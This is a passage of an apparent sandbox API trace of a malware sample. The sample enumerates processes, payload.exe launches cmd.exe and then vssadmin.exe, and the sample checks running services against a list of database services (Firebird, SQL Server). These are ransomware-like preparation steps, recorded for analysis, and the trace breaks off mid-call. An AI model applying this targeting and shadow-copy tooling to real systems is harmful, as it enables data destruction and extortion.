th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0043.617] lstrlenW (lpString="dwm.exe") returned 7 [0043.617] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0043.618] lstrlenW (lpString="explorer.exe") returned 12 [0043.618] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0043.619] lstrlenW (lpString="spoolsv.exe") returned 11 [0043.619] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0043.619] lstrlenW (lpString="taskhost.exe") returned 12 [0043.619] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.620] lstrlenW (lpString="svchost.exe") returned 11 [0043.620] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0043.621] lstrlenW (lpString="taskeng.exe") returned 11 [0043.621] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0043.621] lstrlenW (lpString="taskhost.exe") returned 12 [0043.621] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0043.622] lstrlenW (lpString="carried trinity.exe") returned 19 [0043.622] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0043.623] lstrlenW (lpString="heaven.exe") returned 10 [0043.623] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0043.623] lstrlenW (lpString="dell.exe") returned 8 [0043.623] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0043.624] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0043.624] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0043.625] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0043.625] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0043.625] lstrlenW (lpString="til ear equal.exe") returned 17 [0043.625] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0043.626] lstrlenW (lpString="itunes-bring.exe") returned 16 [0043.626] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0043.627] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0043.627] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0043.627] lstrlenW (lpString="philadelphia.exe") returned 16 [0043.628] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0043.628] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0043.628] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0043.718] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0043.723] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0043.745] lstrlenW (lpString="fraud stuck.exe") returned 15 [0043.745] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0043.753] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0043.754] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0043.769] lstrlenW (lpString="attended.exe") returned 12 [0043.770] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0043.783] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0043.784] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0043.796] lstrlenW (lpString="pan physician.exe") returned 17 [0043.797] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0043.812] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0043.813] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0043.902] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0043.903] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0043.914] lstrlenW (lpString="over-celebrity.exe") returned 18 [0043.916] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0043.936] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0043.936] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0043.967] lstrlenW (lpString="payload.exe") returned 11 [0043.968] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0043.992] lstrlenW (lpString="cmd.exe") returned 7 [0043.992] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0043.993] lstrlenW (lpString="conhost.exe") returned 11 [0043.993] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0043.993] lstrlenW (lpString="vssadmin.exe") returned 12 [0043.994] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0043.994] lstrlenW (lpString="VSSVC.exe") returned 9 [0043.994] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0043.995] lstrlenW (lpString="svchost.exe") returned 11 [0043.995] Process32NextW (in: hSnapshot=0x1b8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0043.995] CloseHandle (hObject=0x1b8) returned 1 [0043.996] Sleep (dwMilliseconds=0x1f4) [0044.709] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626ca8 [0044.710] EnumServicesStatusExW (in: hSCManager=0x626ca8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0044.711] GetLastError () returned 0xea [0044.711] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x6c08c8 [0044.711] EnumServicesStatusExW (in: hSCManager=0x626ca8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0044.711] CloseServiceHandle (hSCObject=0x626ca8) returned 1 [0044.712] lstrlenW (lpString="Appinfo") returned 7 [0044.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0044.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0044.712] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0044.712] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0044.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0044.712] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0044.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.712] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0044.712] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0044.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0044.712] lstrlenW (lpString="AudioSrv") returned 8 [0044.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0044.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0044.712] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0044.712] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0044.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0044.712] lstrlenW (lpString="BFE") returned 3 [0044.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0044.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0044.712] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0044.712] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0044.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0044.712] lstrlenW (lpString="CryptSvc") returned 8 [0044.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0044.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0044.712] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0044.712] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0044.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0044.712] lstrlenW (lpString="CscService") returned 10 [0044.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0044.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0044.713] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0044.713] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0044.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0044.713] lstrlenW (lpString="DcomLaunch") returned 10 [0044.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.713] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0044.713] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0044.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0044.713] lstrlenW (lpString="Dhcp") returned 4 [0044.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0044.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0044.713] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0044.713] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0044.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0044.713] lstrlenW (lpString="Dnscache") returned 8 [0044.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0044.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0044.713] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0044.713] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0044.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0044.713] lstrlenW (lpString="DPS") returned 3 [0044.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0044.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0044.713] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0044.713] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0044.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0044.713] lstrlenW (lpString="eventlog") returned 8 [0044.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0044.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0044.713] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0044.713] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0044.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0044.713] lstrlenW (lpString="EventSystem") returned 11 [0044.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0044.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0044.714] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0044.714] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0044.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0044.714] lstrlenW (lpString="gpsvc") returned 5 [0044.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0044.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0044.714] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0044.714] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0044.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0044.714] lstrlenW (lpString="iphlpsvc") returned 8 [0044.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.714] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0044.714] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0044.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0044.714] lstrlenW (lpString="LanmanServer") returned 12 [0044.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0044.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0044.714] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0044.714] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0044.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0044.714] lstrlenW (lpString="LanmanWorkstation") returned 17 [0044.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.714] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0044.714] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0044.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0044.714] lstrlenW (lpString="lmhosts") returned 7 [0044.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0044.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0044.714] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0044.714] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0044.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0044.715] lstrlenW (lpString="MMCSS") returned 5 [0044.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0044.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0044.715] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0044.715] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0044.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0044.715] lstrlenW (lpString="MpsSvc") returned 6 [0044.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0044.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0044.715] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0044.715] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0044.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0044.715] lstrlenW (lpString="Netman") returned 6 [0044.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0044.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0044.715] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0044.715] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0044.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0044.715] lstrlenW (lpString="netprofm") returned 8 [0044.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0044.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0044.715] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0044.715] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0044.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0044.715] lstrlenW (lpString="NlaSvc") returned 6 [0044.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0044.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0044.715] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0044.715] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0044.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0044.715] lstrlenW (lpString="nsi") returned 3 [0044.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0044.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0044.715] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0044.715] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0044.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0044.715] lstrlenW (lpString="PcaSvc") returned 6 [0044.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0044.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0044.716] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0044.716] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0044.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0044.716] lstrlenW (lpString="PlugPlay") returned 8 [0044.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0044.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0044.716] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0044.716] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0044.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0044.716] lstrlenW (lpString="Power") returned 5 [0044.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0044.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0044.716] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0044.716] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0044.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0044.716] lstrlenW (lpString="ProfSvc") returned 7 [0044.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0044.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0044.716] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0044.716] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0044.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0044.716] lstrlenW (lpString="RpcEptMapper") returned 12 [0044.716] lstrcmpiW 